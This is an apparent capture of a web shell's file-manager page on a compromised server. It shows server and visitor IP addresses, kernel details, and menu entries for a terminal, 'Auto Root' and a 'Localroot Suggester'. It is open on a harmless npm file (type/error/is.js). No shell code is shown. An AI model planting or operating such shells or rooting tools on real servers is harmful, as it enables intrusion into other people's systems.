Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.216.95.250
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
type /
error /
Delete
Unzip
Name
Size
Permission
Date
Action
ensure.js
273
B
-rw-rw-r--
2022-08-30 11:49
is.js
1.53
KB
-rw-rw-r--
2022-08-30 11:49
Save
Rename
"use strict"; var isPrototype = require("../prototype/is") , isPlainObject = require("../plain-object/is"); var objectToString = Object.prototype.toString; // Recognize host specific errors (e.g. DOMException) var errorTaggedStringRe = /^\[object .*(?:Error|Exception)\]$/ , errorNameRe = /^[^\s]*(?:Error|Exception)$/; module.exports = function (value) { if (!value) return false; var name; // Sanity check (reject objects which do not expose common Error interface) try { name = value.name; if (typeof name !== "string") return false; if (typeof value.message !== "string") return false; } catch (error) { return false; } // Ensure its a native-like Error object // (has [[ErrorData]] slot, or was created to resemble one) // Note: It's not a 100% bulletproof check of confirming that as: // - In ES2015+ string tag can be overriden via Symbol.toStringTag property // - Host errors do not share native error tag. Still we rely on assumption that // tag for each error will end either with `Error` or `Exception` string // - In pre ES2015 era, no custom errors will share the error tag. if (!errorTaggedStringRe.test(objectToString.call(value))) { // Definitely not an ES2015 error instance, but could still be an error // (created via e.g. CustomError.prototype = Object.create(Error.prototype)) try { if (name !== value.constructor.name) return false; } catch (error) { return false; } if (!errorNameRe.test(name)) return false; if (isPlainObject(value)) return false; } return !isPrototype(value); };